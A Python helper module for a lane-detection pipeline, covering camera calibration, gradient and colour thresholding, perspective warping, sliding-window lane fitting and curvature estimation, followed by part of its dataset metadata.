'''\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n objp = np.zeros((nx*ny,3), np.float32)\n objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Step through the list and search for chessboard corners\n for idx, fname in enumerate(cal_images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx,ny), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\n return mtx, dist\n\ndef camera_setup(calibration_path='camera_cal/calibration*.jpg', nx=9, ny=6):\n '''\n camera_setup sets up calibration images and returns camera calibration results\n :param calibration_path:\n :param nx: number of squares in width of checkerboard\n :param ny: number of square in height of checkerboard\n :return:\n '''\n # Make a list of calibration images\n cal_images = glob.glob(calibration_path)\n cam_mtx, cam_dist = camera_calibrate(cal_images, nx, ny)\n return cam_mtx, cam_dist\n\ndef cal_undistort(img, mtx, dist):\n '''\n cal_undistort undistorts images\n :param img:\n :param objpoints:\n :param imgpoints:\n :return:\n '''\n # Use cv2.calibrateCamera() and cv2.undistort()\n #gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #ret, corners = cv2.findChessboardCorners(gray, (8,6), None)\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n #undist = np.copy(img) # Delete this line\n return undist\n\n# Define a function that takes an image, number of x and y points,\n# camera matrix and distortion coefficients\ndef corners_unwarp(img, nx, ny, mtx, dist):\n # Use the OpenCV undistort() function to remove distortion\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n # Convert undistorted image to grayscale\n gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)\n # Search for corners in the grayscaled image\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n if ret == True:\n # If we found corners, draw them! (just for fun)\n cv2.drawChessboardCorners(undist, (nx, ny), corners, ret)\n # Choose offset from image corners to plot detected corners\n # This should be chosen to present the result at the proper aspect ratio\n # My choice of 100 pixels is not exact, but close enough for our purpose here\n offset = 100 # offset for dst points\n # Grab the image shape\n img_size = (gray.shape[1], gray.shape[0])\n\n # For source points I'm grabbing the outer four detected corners\n src = np.float32([corners[0], corners[nx-1], corners[-1], corners[-nx]])\n # For destination points, I'm arbitrarily choosing some points to be\n # a nice fit for displaying our warped result\n # again, not exact, but close enough for our purposes\n dst = np.float32([[offset, offset], [img_size[0]-offset, offset],\n [img_size[0]-offset, img_size[1]-offset],\n [offset, img_size[1]-offset]])\n # Given src and dst points, calculate the perspective transform matrix\n M = cv2.getPerspectiveTransform(src, dst)\n # Warp the image using OpenCV warpPerspective()\n warped = cv2.warpPerspective(undist, M, img_size)\n\n # Return the resulting image and matrix\n return warped, M\n\n# Define a function that takes an image, gradient orientation,\n# and threshold min / max values.\ndef abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255, sobel_kernel = 3):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Apply x or y gradient with the OpenCV Sobel() function\n # and take the absolute value\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel))\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel))\n # Rescale back to 8 bit integer\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n # Create a copy and apply the threshold\n binary_output = np.zeros_like(scaled_sobel)\n # Here I'm using inclusive (>=, <=) thresholds, but exclusive is ok too\n binary_output[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n\n # Return the result\n return binary_output\n\n# Define a function to return the magnitude of the gradient\n# for a given sobel kernel size and threshold values\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Take both Sobel x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Calculate the gradient magnitude\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n # Create a binary image of ones where threshold is met, zeros otherwise\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\n# Define a function to threshold an image for a given range and Sobel kernel\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n # Grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Calculate the x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Take the absolute value of the gradient direction,\n # apply a threshold, and create a binary image result\n absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n binary_output = np.zeros_like(absgraddir)\n binary_output[(absgraddir >= thresh[0]) & (absgraddir <= thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\ndef color_threshold(img, channel=2, s_thresh=(170, 255)):\n # Convert to HSV color space and separate the V channel\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)\n s_channel = hsv[:, :, channel]\n\n # Threshold color channel\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n return s_binary\n\ndef pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img = np.copy(img)\n\n # gradient\n ksize = 3 # Choose a larger odd number to smooth gradient measurements\n gradx = abs_sobel_thresh(img, orient='x', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n grady = abs_sobel_thresh(img, orient='y', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n\n # color\n s_binary = color_threshold(img, 2, s_thresh)\n color_binary = np.dstack((np.zeros_like(gradx), gradx, s_binary))\n\n # mag and dir\n mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(0, 255))\n dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0, np.pi / 2))\n\n combined_binary = np.zeros_like(dir_binary)\n combined_binary[(s_binary == 1)|((gradx == 1) & (grady == 1))]=255# | ((mag_binary == 1) & (dir_binary == 1))] = 1\n\n return color_binary, combined_binary\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\ndef get_perspective_transform(image, src_in = None, dst_in = None):\n img_size = image.shape\n a = 60\n b = 10\n d = 100\n if src_in is None:\n src_out = np.array([[(img_size[1]/2) - a, (img_size[0]/2) + d],\n [(img_size[1]/6) - b, img_size[0]],\n [(img_size[1]*5/6)+a-b, img_size[0]],\n [(img_size[1]/2)+a+0.5*b, (img_size[0]/2) + d]], np.float32)\n else:\n src_out = src_in\n\n if dst_in is None:\n dst_out = np.array([[(img_size[1]/4), 0],\n [(img_size[1]/4), img_size[0]],\n [(img_size[1]*3/4), img_size[0]],\n [(img_size[1]*3/4), 0]], np.float32)\n\n else:\n dst_out = dst_in\n\n warp_m = cv2.getPerspectiveTransform(src_out, dst_out)\n warp_minv = cv2.getPerspectiveTransform(dst_out, src_out)\n\n return src_out, dst_out, warp_m, warp_minv\n\ndef generate_plot(binary_warped, left_fit, right_fit, line=None):\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n return left_fitx, right_fitx, ploty\n\n\ndef get_lane_lines(binary_warped):\n # Assuming you have created a warped binary image called \"binary_warped\"\n # Take a histogram of the bottom half of the image\n histogram = np.sum(binary_warped[np.int(binary_warped.shape[0] / 2):, :], axis=0)\n # Create an output image to draw on and visualize the result\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0] / 2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n # Choose the number of sliding windows\n nwindows = 9\n # Set height of windows\n window_height = np.int(binary_warped.shape[0] / nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 100\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n\n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window + 1) * window_height\n win_y_high = binary_warped.shape[0] - window * window_height\n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n # Draw the windows on the visualization image\n cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)\n cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)\n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (\n nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (\n nonzerox < win_xright_high)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n\n # Generate x and y values for plotting\n left_fitx, right_fitx, ploty = generate_plot(binary_warped, left_fit, right_fit)\n\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty, out_img\n\ndef get_lane_lines_with_prior(binary_warped, left_fit, right_fit):\n # Assume you now have a new warped binary image\n # from the next frame of video (also called \"binary_warped\")\n # It's now much easier to find line pixels!\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n margin = 150\n left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (\n nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))\n right_lane_inds = (\n (nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (\n nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))\n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n plt.imshow(result)\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n plt.xlim(0, 1280)\n plt.ylim(720, 0)\n\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty, result\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\n # Go through each layer looking for max pixel locations\n for level in range(1, (int)(warped.shape[0] / window_height)):\n # convolve the window into the vertical slice of the image\n image_layer = np.sum(\n warped[int(warped.shape[0] - (level + 1) * window_height):int(warped.shape[0] - level * window_height), :],\n axis=0)\n conv_signal = np.convolve(window, image_layer)\n # Find the best left centroid by using past left center as a reference\n # Use window_width/2 as offset because convolution signal reference is at right side of window, not center of window\n offset = window_width / 2\n l_min_index = int(max(l_center + offset - margin, 0))\n l_max_index = int(min(l_center + offset + margin, warped.shape[1]))\n l_center = np.argmax(conv_signal[l_min_index:l_max_index]) + l_min_index - offset\n # Find the best right centroid by using past right center as a reference\n r_min_index = int(max(r_center + offset - margin, 0))\n r_max_index = int(min(r_center + offset + margin, warped.shape[1]))\n r_center = np.argmax(conv_signal[r_min_index:r_max_index]) + r_min_index - offset\n # Add what we found for that layer\n window_centroids.append((l_center, r_center))\n\n return window_centroids\n\ndef sliding_window_convolution(warped):\n # window settings\n window_width = 50\n window_height = 80 # Break image into 9 vertical layers since image height is 720\n margin = 100 # How much to slide left and right for searching\n\n window_centroids = find_window_centroids(warped, window_width, window_height, margin)\n\n # If we found any window centers\n if len(window_centroids) > 0:\n\n # Points used to draw all the left and right windows\n l_points = np.zeros_like(warped)\n r_points = np.zeros_like(warped)\n\n # Go through each level and draw the windows\n for level in range(0, len(window_centroids)):\n # Window_mask is a function to draw window areas\n l_mask = window_mask(window_width, window_height, warped, window_centroids[level][0], level)\n r_mask = window_mask(window_width, window_height, warped, window_centroids[level][1], level)\n # Add graphic points from window mask here to total pixels found\n l_points[(l_points == 255) | ((l_mask == 1))] = 255\n r_points[(r_points == 255) | ((r_mask == 1))] = 255\n\n # Draw the results\n template = np.array(r_points + l_points, np.uint8) # add both left and right window pixels together\n zero_channel = np.zeros_like(template) # create a zero color channle\n template = np.array(cv2.merge((zero_channel, template, zero_channel)), np.uint8) # make window pixels green\n warpage = np.array(cv2.merge((warped, warped, warped)),\n np.uint8) # making the original road pixels 3 color channels\n output = cv2.addWeighted(warpage, 1, template, 0.5, 0.0) # overlay the orignal road image with window results\n\n # If no window centers found, just display orginal road image\n else:\n output = np.array(cv2.merge((warped, warped, warped)), np.uint8)\n\n return output\n\ndef get_curvature(ploty, left_fit, right_fit, leftx, rightx, xm_per_pix = 3.7 / 700, ym_per_pix= 30 / 720):\n # Define y-value where we want radius of curvature\n # I'll choose the maximum y-value, corresponding to the bottom of the image\n y_eval = np.max(ploty)\n #left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])\n #right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])\n #print(left_curverad, right_curverad)\n # Example values: 1926.74 1908.48\n\n # Define conversions in x and y from pixels space to meters\n #ym_per_pix = 30 / 720 # meters per pixel in y dimension\n #xm_per_pix = 3.7 / 700 # meters per pixel in x dimension\n\n # Fit new polynomials to x,y in world space\n left_fit_cr = np.polyfit(ploty * ym_per_pix, leftx * xm_per_pix, 2)\n right_fit_cr = np.polyfit(ploty * ym_per_pix, rightx * xm_per_pix, 2)\n # Calculate the new radii of curvature\n left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n 2 * left_fit_cr[0])\n right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n 2 * right_fit_cr[0])\n\n return left_curverad, right_curverad\n\ndef draw(undist, image, warped, left_fitx, right_fitx, ploty, Minv, left_curverad, right_curverad, line_base_pos, detected, left_curverad_current, right_curverad_current, line_base_pos_current, straightAway=False):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(warped).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (image.shape[1], image.shape[0]))\n # Combine the result with the original image\n result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n plt.imshow(result)\n\n # write curvature and position findings\n font = cv2.FONT_HERSHEY_SIMPLEX\n fontColor = (255, 255, 255)\n if(not detected):\n fontColor = (255,0,0)\n cv2.putText(result, 'Radius of left line curvature: ' + str(left_curverad) + ' compared to '+str(left_curverad_current)+ ' m', (50, 20), font, 1, fontColor, 2, cv2.LINE_AA)\n cv2.putText(result, 'Radius of right line curvature: ' + str(right_curverad) + ' compared to '+str(right_curverad_current)+ ' m', (50, 50), font, 1, fontColor, 2,\n cv2.LINE_AA)\n cv2.putText(result, 'Vehicle position : %.2f m %s of center compared to %s' % (abs(line_base_pos), 'left' if line_base_pos < 0 else 'right', str(line_base_pos_current)), (50, 80),\n font, 1, fontColor, 2, cv2.LINE_AA)\n if(straightAway):\n cv2.putText(result, 'Straight Lanes Detected', (50, 100), font, 1, fontColor, 2, cv2.LINE_AA)\n\n return result\n\ndef get_vehicle_position(image, left_fitx, right_fitx, xm_per_pix):\n # determine vehicle position\n vehicle_pos = image.shape[1] // 2\n middle = (left_fitx[-1] + right_fitx[-1]) // 2\n line_base_pos = (vehicle_pos - middle) * xm_per_pix\n\n return line_base_pos\n\n\n", "sub_path": "Helper_Functions.py", "file_name": "Helper_Functions.py", "file_ext": "py", "file_size_in_byte": 26825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 37, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 149, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2HLS", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 233, "usage_type": "attribute"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 293, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 